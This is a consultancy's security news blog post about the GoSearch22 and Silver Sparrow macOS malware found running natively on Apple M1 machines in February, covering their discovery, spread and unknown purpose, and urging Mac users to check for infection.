Ominous Silver Sparrow Infects Nearly 30,000 Macs

Two novel strains of malware that run natively on Apple’s M1 processor have been discovered. Silver Sparrow remains a mystery with no determined payload.

There has long been a myth perpetuating the internet that MacOS doesn’t get viruses. Some people even believe they can’t get a virus. The reality is that neither of those things is true. For many years, there weren’t many viruses created for MacOS simply because they weren’t as widely used as other PCs. The ability to create those viruses has always existed, but it was never lucrative for threat actors. Today it’s very different, though. Two separate forms of malware designed to run natively on Apple’s M1 processor were discovered within a week of each other this month: GoSearch22 and Silver Sparrow.

The first piece of malware was discovered by security researcher Pat Wardle on February 14. It is a piece of adware malware that is part of the Pirrit family, its malicious extension GoSearch22 had its certificate revoked by Apple. That action means that this version of GoSearch22 won’t run on macOS anymore. At least, not unless they sign it with another developer key.

The second piece of malware was discovered by research firm Red Canary, which named the malware Silver Sparrow. It was reported on February 17, a mere three days after the discovery of GoSearch22. There is something different about this one, though. From the Red Canary blog post:

“Earlier this month, Red Canary detection engineers Wes Hurd and Jason Killam came across a strain of macOS malware using a LaunchAgent to establish persistence. Nothing new there. However, our investigation almost immediately revealed that this malware, whatever it was, did not exhibit the behaviors that we’ve come to expect from the usual adware that so often targets macOS systems. The novelty of this downloader arises primarily from the way it uses JavaScript for execution—something we hadn’t previously encountered in other macOS malware—and the emergence of a related binary compiled for Apple’s new M1 ARM64 architecture.”

There’s more that’s different, too. First, researchers have yet to determine how this malware has infected almost 30,000 macOS endpoints. Second, there doesn’t seem to be a payload. Once an hour the infected Macs check a control server to see if there are any new commands to be run or executed. Third, it comes equipped with the ability to remove itself.

This malware presents a number of problems. Experts are stumped because they don’t know what it does. Malware isn’t designed for no reason, so what is the purpose here? Is it waiting for some specific set of criteria to be met, at which time it will unleash its wrath? Is it a scout program designed to measure how systems respond, length of time to detection and other factors which make it easier to hide? And how did it get there in the first place?

The assumption is that this is some type of adware similar, yet obviously distinct, to the first strain of malware found. The theories around what it does range from nothing to a plethora of damage depending on who you ask. Silver Sparrow has been found in 153 countries as of February 17, including the US, UK, Canada, France and Germany. Such a widespread area is also cause for concern, especially with more consumers and businesses turning to Apple for an alternative to other OS which regularly have complex and intricate versions of malware that are stingy and frustrating. But the more users turn to Apple, the more threat actors will develop strains of malware that run on macOS.

It is incredibly important for anyone who uses a Mac, whether it be for personal or business, to see if their machine is infected. You can visit the Red Canary post to see the full details on how to see if your machine is infected and to learn how to remove the malware. We highly recommend doing this. Even if no one knows what the malware does, it’s pretty safe to assume it’s not going to do anything good.

Malware and other cybersecurity threats are not going anywhere, no matter which OS you use. There are strains for every OS being used, and this is a prime example. The M1 processor was released just last year and already there are two strains of malware that run natively on it. And it’s designed for Mac, which makes up a fraction of the machines in use today. Play it safe and be proactive, hunt that malware down now and eradicate it from your system before it actually does something bad. Apple revoked Silver Sparrow’s certificate so it can no longer spread, so fix the problem now and get ahead of the threat actors.

About the Author

PWV Consultants is a boutique group of industry leaders and influencers from the digital tech, security and design industries that acts as trusted technical partners for many Fortune 500 companies, high-visibility startups, universities, defense agencies, and NGOs. Founded by 20-year software engineering veterans, who have founded or co-founder several companies. PWV experts act as a trusted advisors and mentors to numerous early stage startups, and have held the titles of software and software security executive, consultant and professor. PWV's expert consulting and advisory work spans several high impact industries in finance, media, medical tech, and defense contracting. PWV's founding experts also authored the highly influential precursor HAZL (jADE) programming language.

Contact us

Contact Us About Anything

Need Project Savers, Tech Debt Wranglers, Bleeding Edge Pushers?

Please drop us a note let us know how we can help. If you need help in a crunch make sure to mark your note as Urgent. If we can't help you solve your tech problem, we will help you find someone who can.

1350 Avenue of the Americas, New York City, NY